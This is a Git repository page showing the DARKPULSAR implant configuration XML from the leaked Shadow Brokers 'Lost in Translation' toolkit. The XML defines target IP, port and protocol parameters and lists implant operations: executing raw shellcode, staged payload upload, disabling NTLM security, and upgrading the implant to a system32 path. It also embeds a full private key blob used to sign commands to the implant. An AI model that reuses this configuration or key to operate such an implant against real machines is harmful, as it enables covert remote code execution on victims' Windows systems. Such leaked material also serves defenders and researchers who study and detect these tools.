sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/implants/Darkpulsar-1.1.0.9.xml
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

83 lines
9.5 KiB
XML
Raw Blame History

<?xml version='1.0' encoding='utf-8'?>
<config xmlns='urn:trch' name='Darkpulsar' version='1.1.0' schemaversion='2.1.0' configversion='1.1.0.0' id='10c67c6f8ff73eb12e2f96318b878835e3513aae'>
<inputparameters>
<parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
<default>60</default>
</parameter>
<parameter xdevmap='TARGET_IP_V4_ADDRESS' type='IPv4' name='TargetIp' description='Target IP Address'/>
<parameter xdevmap='TARGET_PORT' type='TcpPort' name='TargetPort' description='Port used by the remote service'/>
<parameter name='SspMTU' required='false' xdevmap='SSP_MTU_SIZE' hidden='true' type='S32' description='Data fragmentation size'/>
<paramchoice name='Architecture' description='Architecture Type'>
<default>x86</default>
<paramgroup name='x86' description='x86 Architecture'/>
<paramgroup name='x64' description='x64 Architecture'/>
</paramchoice>
<parameter xdevmap='FRAGMENT_SIZE' type='U32' name='SSPFragmentSize' description='Fragment size (leave as default except when performing EDFStagedUpload against a Vista/2k8 target. Against these targets, 480 or lower is appropriate)'>
<default>0</default>
</parameter>
<paramchoice name='Protocol' description='The remote target protocol'>
<default>SMB</default>
<paramgroup name='SMB' description='Microsft Simple Message Block (SMB) over TCP (445)'>
<parameter type='Boolean' name='UseNTLMSSPHeader' description='Supress network signatures on NTLM authenticaion blobs by prepending a valid header. Set to False if talking to a version 1.0 implant.'>
<default>True</default>
</parameter>
</paramgroup>
<paramgroup name='NBT' description='SMB over NetBIOS (normally port 139)'>
<parameter type='Boolean' name='UseNTLMSSPHeader' description='Supress network signatures on NTLM authenticaion blobs by prepending a valid header. Set to False if talking to a version 1.0 implant.'>
<default>True</default>
</parameter>
</paramgroup>
<paramgroup name='SSL' description='Secure Socket Layer (SSL) - Microsoft IIS'/>
<paramgroup name='RDP' description='Microsoft Remote Desktop Protocol'/>
</paramchoice>
<paramchoice name='ImplantAction' description='The remote operation to perform'>
<default/>
<paramgroup name='Burn' description='Burn / Uninstall DARKPULSAR'/>
<paramgroup name='RawShellcode' description='Execute Raw Shellcode'>
<parameter type='Buffer' name='Shellcode' description='Blob of shellcode to execute'/>
</paramgroup>
<paramgroup name='EDFStagedUpload' description='Execute EDF Staged Upload'/>
<paramgroup name='DisableSecurity' description='Disables all NTLM protocol security'/>
<paramgroup name='EnableSecurity' description='Re-enables NTLM protocol security'/>
<paramgroup name='UpgradeImplant' description='Upgrades DAPU'>
<parameter type='LocalFile' name='NewFile' description='Path to the new implant file'/>
<parameter type='String' name='WritePath' description='Path to write the new file on the remote system'>
<default>c:\windows\system32\sipauth32.tsp</default>
</parameter>
</paramgroup>
<paramgroup name='PingPong' description='Test plugin communications'>
<parameter type='U32' name='PingPongBufferSize' description='Buffer size to test communications'>
<default>100</default>
</parameter>
</paramgroup>
</paramchoice>
<paramchoice name='PrivateKeyInputType' description='The remote operation to perform'>
<default>XML</default>
<paramgroup name='XML' description='Private key is specified in the XML file'>
<parameter xdevmap='DUMBPULSAR_SIG_PRIVATE_KEY' hidden='true' type='Buffer' name='SigPrivateKey' description='Blob containing private key for signing'>
<default>\x07\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x32\x00\x08\x00\x00\x01\x00\x01\x00\xc1\x59\x98\x68\xe3\x16\x5b\x33\x88\x18\xf5\xdb\x5c\xf4\x62\x1c\xcb\x1b\x9d\xb8\xa1\x20\x79\x99\xde\xe7\x61\x56\x55\x77\xce\x5b\x86\x76\x95\xa3\xc6\x0c\xf0\xad\x96\x8e\x6d\x84\xca\x17\xa5\x93\xb2\x58\x74\x7e\x10\x87\x72\x6b\x88\x13\x2c\x77\x54\xa2\x25\x2e\x93\xee\x84\x83\x33\x87\x1a\xa2\xa8\x58\x0e\xac\xaa\xa0\x43\x16\xfe\x1e\x47\x96\x85\xa3\x6d\x72\x38\x44\xf0\xd0\x72\x6b\xbf\xc8\x6d\x00\x30\xc5\x8b\xcd\xb2\x34\x21\xac\x74\xd1\x11\xc2\xc8\xcd\x68\x80\x2b\xa3\xd4\xca\xe1\x58\xd3\x8f\x9e\x44\x51\x53\x4a\x5d\xcd\x10\x1e\x3f\x85\xe6\x7b\x7b\x54\xae\x80\x15\xea\x44\x4e\x13\xde\x4f\x24\xbc\xd5\xe7\x72\x1f\x49\x9c\x71\x86\xb1\x1b\x5e\x8f\x3d\xb1\xe6\x93\x6d\xe8\xbc\xf0\x19\x9e\x42\x01\x1e\x3b\x1a\x81\x3c\xbc\x1d\x6a\x9c\x3f\x18\x31\x9a\x8f\xc7\xf1\x71\x94\xa6\x1d\xbe\xad\xc7\x52\x1a\x22\xdd\x92\xf2\x2e\x8d\x39\x0a\xb0\xef\x2e\xbe\x76\xea\xd8\x7e\x05\x1b\x3e\xd5\x07\x00\xc1\x3f\xec\x2d\xc5\x33\x97\x4f\x1e\x58\xb2\x9c\x29\xf9\xde\xfe\x97\xc9\x05\x2f\xab\xf3\x13\x53\xe4\xde\x2a\xdc\xa7\xc5\xfe\xbe\xc2\x87\x8f\x89\xda\xd3\x8f\xe8\xf0\xd2\x80\x5d\xc4\xad\x8c\xd5\xed\xe1\x1a\xc0\xcd\x6d\x81\x23\xf1\x8e\xd8\xca\xdf\xd9\xbc\xfe\xdc\x08\x42\x30\x87\x3e\x73\xe5\x45\x74\xa3\x2e\xed\x44\xa0\xe7\x3e\xd2\x96\xb5\x30\x0d\x20\xd8\x8e\x0b\x9d\x61\xc2\x1d\x9a\x72\x5a\x5c\xfa\x17\x4d\xb9\x48\xa3\x49\xc0\xa6\xc2\x17\xd8\x0c\x1e\xb2\xc1\x85\xac\xf7\x42\x69\xe5\xaa\x88\x89\x01\x4a\x19\x45\xe5\xac\x81\x8d\x89\xb8\xea\x32\x21\xe4\x47\xf1\xf5\x00\x38\x1a\x57\x62\xef\x33\xae\x25\x5b\xfa\x56\x43\x6d\xae\xfb\x64\x8a\xa5\x1b\xa1\xd3\xd3\xe5\xfb\x9b\x87\xab\x12\x24\x59\xd1\x28\x80\xee\xf0\xba\xb9\x76\xf4\x5a\xae\x13\x25\xa2\xf9\xc6\x2c\x2a\x9c\xe9\xa8\x78\xa3\x57\x7e\x83\xfb\xe1\xb9\xbf\x1e\x9b\x08\x04\xf9\x41\xf5\x5b\x4a\xf9\x8b\x23\x49\xb3\x43\x3b\x34\xeb\x5b\x14\x1c\x49\xe7\x6f\x39\xd1\x34\x12\xa3\xa9\xef\x2b\x10\xa4\x99\x12\xa0\x04\x36\xae\x32\xd4\x14\xb0\xc2\xb3\x56\xb8\xc5\x33\x72\x95\xaf\x35\x50\x4d\x84\x7d\x9b\xce\x53\x45\x7a\x32\x7c\x3b\x6b\x07\x3d\xbb\x45\x51\x3e\xe4\x0a\xbc\x12\x29\x59\x20\x48\xf6\xbd\xea\xdc\x0a\x61\x50\xf7\xa6\x18\xde\xb1\x6f\x92\xb9\x68\x2a\x1c\xb6\xab\x4f\xf0\x2e\xa3\xd9\xf1\x08\x6b\x77\x37\x98\x99\x5d\x5d\x07\x9f\xd3\xe1\xbc\xf3\x8d\xee\x3a\x80\xba\x59\x8e\x70\x0c\x57\xd1\xeb\x35\x4a\x68\xeb\xe8\xf6\xa3\xcb\x6b\xc3\x85\xe3\xc3\xcf\xae\xa7\xf7\xf5\x43\x5f\x9f\xb8\x85\x1e\xac\xa9\x7b\xac\xe9\xfe\x3c\xfb\x7c\x93\xad\x64\xe9\x0a\x01\xa0\x13\x19\xa4\xec\x2c\xef\x2a\x15\x6d\x92\x59\x9f\x72\x9e\x95\x10\xbd\x96\xfe\xac\x56\xed\x8e\x33\x17\xee\xbe\x66\xef\x66\xd4\x95\xf4\x68\xdc\x62\x5d\xa5\x27\xa2\xdd\x45\x82\xd4\xca\x56\xe6\x15\x43\xd7\x32\xd1\xbd\xa9\xb8\xdf\xc2\x2c\x09\xf4\x5c\xcb\x04\x10\xce\x3e\xd7\xf8\x83\x7a\xf6\xce\x7b\x8f\x6d\xb1\x66\xa8\xf7\x02\xf0\xf9\x5c\xe5\x70\x1e\x77\xd2\xd4\xd0\xfe\x74\x57\x8d\x25\xc4\x5d\x16\x93\x05\x23\x50\x8d\x60\xb7\x43\xd3\x04\xb9\xab\xa8\xda\xce\x7b\x5c\x1f\xf0\x27\xa2\xa7\x46\x42\xb5\xfb\x8b\x43\x7e\xde\xc6\xa4\x04\x5f\x1d\xc6\x4e\x00\x51\x4f\xf3\x76\xdf\xcf\x29\xf6\xef\x51\x44\x8e\x03\x01\x18\x6a\x8c\x56\x9b\x80\xc2\xf0\x3d\x1c\xf4\x8c\x79\x0d\xab\xe1\x61\xb6\x24\xfd\x19\xa4\xd0\xae\xd1\x38\x1b\x11\xec\xde\xc4\x6e\x50\xbf\x3a\x5f\x52\x19\xc9\xb2\xa2\x3d\x92\xbe\xc6\x6a\x5e\x3e\x07\x91\xd3\xe4\xb9\xa4\x7d\x3a\x45\x11\x50\xba\x0c\xb8\xaa\xcc\xc6\xce\x9e\x9f\x48\xec\x10\x34\x8b\x4c\xfb\x67\x00\x13\x2b\xdf\x80\x22\xc3\xbb\xd4\xfb\x53\x09\x3c\x17\x7d\x78\xd8\x9c\x78\x11\x9a\xa4\x99\x3e\x3e\x33\x68\xa4\xea\x77\x11\x44\x64\x00\xe4\x8a\x1c\x1d\x2e\xe4\xe1\xcb\x5a\xe9\x60\x10\xfe\x13\x5b\x07\x88\xa9\x29\x75\x5d\x9b\x92\x65\x03\x67\x2c\x20\xef\xce\x13\x08\x66\x42\xee\xf2\x87\xff\xf6\xef\xab\xeb\xb6\x3d\x81\x4e\x60\xd8\x92\xf5\x4b\x65\xdb\x64\x0b\xd6\x92\x14\xa0\x7b\x84\x43\xd9\x8d\x94\xfb\xb2\xab\xc9\x6b\x93\xbc\xca\x6c\x71\xe1\x82\x91\xc4\x25\xe5\xde\xb1\x42\x8d\xd1\x82\x59\x6f\xc2\xe1\xd7\x7a\x89\x40\x4d\xb7\xc9\xfe\x0a\xf5\x41\x2b\xf9\xca\xb3\xb0\x7d\x7c\x12\x07\x04\x14\xdb\xdc\xba\x73\x42\x3d\xb5\xd5\xe2\x21\xea\xb8\xa3\x54\xc7\xe8\x59\xb1\x4f\x67\xf7\x9b\xaf\x12\x94\x62\x8b\x65\xb4\x78\x53\x7f\x87\xaf\x73\x00\xdd\x97\x04\x8c\x01\xd2\x60\xc9\x1b\x7a\xc3\x81\x50\x89\x4a\xeb\x66\xf8\xb6\x64\x23\x19\x7e\x1a\xa7\x64\x1b\xf8\x52\x04\xcf\xbe\x13\x91\x91\xd1\x43\x93\x63\x5b\x51\xcc\x0c\x3c\x1f\x6a\x4f\xd1\xaa\x93\x1c\x2a\x3f\x5f\x65\xdf\x04\x6d\x75\xb8\x00\xc9\xc6\x71\xdf\x45\x7c\xe5\x93\x13\x97\x34\x2b\x11\x9a\xc3\x10\x47\x79\x60\x07\xcb\xcd\x4e\x6d\x98\x09\xcb\x92\xe2\x59\x55\x65\xd9\xae\xa8\x90\x97\x86\x98\x34\x77\xec\x1f\x77\x6f\x1e\xc5\x63\xe0\xcc\x48\x20\x4e\x0b\x2b\xf8\xb8\x67\x2f\x00\x70\xb9\x71\x40\x65\x56\x7a\xc8\x3c\x93\x6f\x90\x93\x07\xba\xe1\xd6\x8b\x81\x45\x00\xbe\x6d\x91\x35\xd2\x34\x8b\x6d</default>
</parameter>
</paramgroup>
<paramgroup name='File' description='Private key is read from a local binary file'>
<parameter type='LocalFile' name='PrivateKeyFile' description='File containing private key for signing'/>
</paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
<paramgroup name='StagedUpload' description=''>
<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
<parameter type='U8' name='XorMask' description='Masking byte'/>
</paramgroup>
</paramchoice>
</outputparameters>
<redirection>
<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='false' destaddr='TargetIp' destport='TargetPort'/>
</redirection>
<logic>
<service name='dapu'>
<bindtopath path="//service[name='dapu']/port" name='TargetPort'/>
</service>
<bindtopath path='//identifier' name='TargetIp'/>
</logic>
</config>
Reference in a new issue View git blame Copy permalink